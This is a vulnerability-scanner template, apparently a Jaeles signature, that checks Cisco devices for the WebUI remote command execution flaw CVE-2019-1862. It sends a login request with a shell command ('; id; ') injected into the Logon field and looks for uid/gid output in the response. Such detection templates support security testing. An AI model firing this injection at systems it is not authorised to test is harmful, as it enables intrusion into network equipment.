id: cisco-webui-rce
single: true
info:
  name: Cisco WebUI RCE (CVE-2019-1862)
  risk: High

params:
  - root: '{{.BaseURL}}'

requests:
  - method: GET
    redirect: false
    url: >-
     {{.root}}/mainfile.php?username=RCE&password=BB2&_login=1&Logon=%27%3Bid%3B%27
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "gid=") && StringSearch("response", 'uid=')

reference:
  - link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190513-webui
  - verify: false